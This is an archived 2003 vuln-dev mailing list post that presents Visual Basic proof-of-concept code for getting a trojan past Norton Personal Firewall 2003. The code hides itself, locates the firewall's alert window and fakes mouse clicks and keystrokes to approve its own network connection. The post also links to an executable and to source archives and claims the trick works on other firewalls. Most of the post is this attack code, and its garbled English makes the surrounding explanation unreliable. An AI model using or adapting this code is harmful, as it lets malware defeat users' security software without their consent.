Bug in Norton FireWall 2003

From: Boy Bear (eyal067_at_walla.co.il)
Date: 08/09/03

  • Next message: Michael Wojcik: "RE: Bug in Norton FireWall 2003"
    Date: 9 Aug 2003 08:12:03 -0000
    To: vuln-dev@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is)

    The Bug factor so lamb Firewall "ignored" from Trojan.

    The Trojan than himself in Firewall and so the actually Trojan worker
    without disturbance the of Firewall.

    I added a model in VB and EXE

    NortonEXE - http://iso.bbs.us:777/binaryvision/Norton/NortonEXE.zip
    NortonSRC- http://iso.bbs.us:777/binaryvision/Norton/NortonSRC.zip

    It is the code:

    Dim numNoWindows As Integer
    Dim CMD1 As Integer
    Const MOUSEEVENTF_MOVE = &H1
    Const MOUSEEVENTF_LEFTDOWN = &H2
    Const MOUSEEVENTF_LEFTUP = &H4
    Const MOUSEEVENTF_RIGHTDOWN = &H8
    Const MOUSEEVENTF_RIGHTUP = &H10
    Const MOUSEEVENTF_MIDDLEDOWN = &H20
    Const MOUSEEVENTF_MIDDLEUP = &H40
    Const MOUSEEVENTF_WHEEL = &H800
    Const MOUSEEVENTF_ABSOLUTE = &H8000

    Private Type POINTAPI
    X As Long
    Y As Long
    End Type

    Private Declare Function GetCursorPos Lib "user32" (lpPoint As POINTAPI)
    As Long
    Private Declare Sub mouse_event Lib "user32" (ByVal dwFlags As Long,
    ByVal dX As Long, _
    ByVal dY As Long, ByVal cButtons As Long, ByVal dwExtraInfo As Long)

    Private Points() As POINTAPI
    Private iCount As Long
    Private Const KLF_REORDER = &H8
    Private Const lang_English = 67699721
    Private Declare Function FindWindow Lib "user32" Alias "FindWindowA"
    (ByVal lpClassName As String, _
    ByVal lpWindowName As String) As Long
    Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long,
    ByVal nCmdShow As Long) As Long
    Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long,
    ByVal hWndInsertAfter As Long, _
    ByVal X As Long, ByVal Y As Long, ByVal CX As Long, ByVal CY As Long,
    ByVal wFlags As Long) As Long
    Private Const SW_HIDE = 0 ' sent to ShowWindow function
    Private Const SW_SHOW = 5 ' sent to ShowWindow function
    Private Const HWND_TOPMOST = -1 'sent to SetWindowPos function
    Private Const vbClass = "wndclass_desked_gsk" 'Visual Basic Class name
    Private Declare Function ActivateKeyboardLayout Lib "user32" (ByVal HKL
    As Long, ByVal flags As Long) As Long

    Private Sub Command1_Click()
    If Winsock2.State <> sckClosed Then Winsock2.Close
    Winsock2.Connect
    End Sub

    Private Sub Command2_Click()
    Winsock1.Listen
    End Sub

    Private Sub Form_Load()
    Dim lForm As Long
    lForm = Me.hwnd
    SetWindowPos lForm, HWND_TOPMOST, 0, 0, 0, 0, 1
    X = Command
    If X = "" Then
    Shell (App.Path & "\" & App.EXEName & ".exe /Connect")
    Winsock2.Connect
    X = ""
    ElseIf X = "/Connect" Then
    X = ""
    Me.Hide
    Timer2.Enabled = True
    End If
    End Sub
    Private Sub Timer2_Timer()
    Dim hwnd As Long
    hwnd = FindWindow(vbNullString, "Norton Personal Firewall")
    If hwnd = 0 Then
    numNoWindows = numNoWindows + 1
    If numNoWindows = 150 Then
    Timer2.Enabled = False
    End
    End If
    Else
    Call ActivateKeyboardLayout(lang_English, KLF_REORDER)
    X = Screen.Width * 2.7
    Y = Screen.Height * 2.7
    mouse_event MOUSEEVENTF_ABSOLUTE + MOUSEEVENTF_MOVE +
    MOUSEEVENTF_LEFTDOWN + MOUSEEVENTF_LEFTUP, Y, X, 0, 0
    CMD1 = CMD1 + 1
    If CMD1 = 1 Then
    Timer2.Interval = 300
    ElseIf CMD1 = 2 Then
    SendKeys "{tab}"
    ElseIf CMD1 = 3 Then
    SendKeys " "
    ElseIf CMD1 = 4 Then
    SendKeys "{UP}"
    SendKeys "{UP}"
    SendKeys "{UP}"
    ElseIf CMD1 = 5 Then
    SendKeys "{ENTER}"
    Timer2.Enabled = False
    End
    End If
    End If
    End Sub
    Private Sub Winsock2_Connect()

    Winsock2.SendData "Msg-Box"

    End Sub
    Private Sub wHideShow(HideShow As Boolean)

    Dim hwnd As Long
    hwnd = FindWindow(vbNullString, "Norton Personal Firewall")
    'if not found then..
    If hwnd = 0 Then
    Exit Sub
    End If
    'if not hidden - hide, else - show
    If HideShow Then
    ShowWindow hwnd, SW_SHOW
    Else
    ShowWindow hwnd, SW_SHOW
    End If

    End Sub

    The Bug can act on the any Firewalls that I recognize (zonealarm,
    BlackICE....)

    The full article situated here (in Hebrew):

    http://tankz.zext.net/binaryvision/index.php?title=bug%20in%20Norton%
    20Firewall%202003&page=modules/articles/display.php&cat=Security&file=bug%
    20in%20Norton%20Firewall%202003&right=modules/articles

    BoyBear From BinaryVision ( http://binaryvision.tech.nu )


  • Next message: Michael Wojcik: "RE: Bug in Norton FireWall 2003"

    Relevant Pages

    • Re: Minimize Maximize buttons
      ... Private lFormHwnd As Long ... Private Sub UserForm_Initialize ... Dim hwnd As Long ...
      (microsoft.public.excel.programming)
    • Re: Communicating between Applications
      ... Private Declare Function CloseHandle _ ... Const SUBLANG_DEFAULT = &H1 ... Private Sub Command1_Click ... Dim BytesWritten As Long ...
      (microsoft.public.vb.general.discussion)
    • Re: Black background printing NOT wanted
      ... Private Sub Form_Activate ... Private Sub Command1_Click ... Const CLIP_DEFAULT_PRECIS = 0 ... Private Type POINTAPI ...
      (comp.lang.basic.visual.misc)
    • Re: ActiveX control to subclass a form
      ... the object (of your class module, instantiated by the client) and it doesn't ... declared Private in the class module itself). ... Friend Sub RaiseAppActivateEvent() ... Public Function SubClass(ByVal hWnd As Long) As Boolean ...
      (microsoft.public.vb.controls)
    • Re: Minimize Maximize buttons
      ... Private lFormHwnd As Long ... Private Sub UserForm_Initialize ... Dim hwnd As Long ... Private Declare Function GetWindowLong _ ...
      (microsoft.public.excel.programming)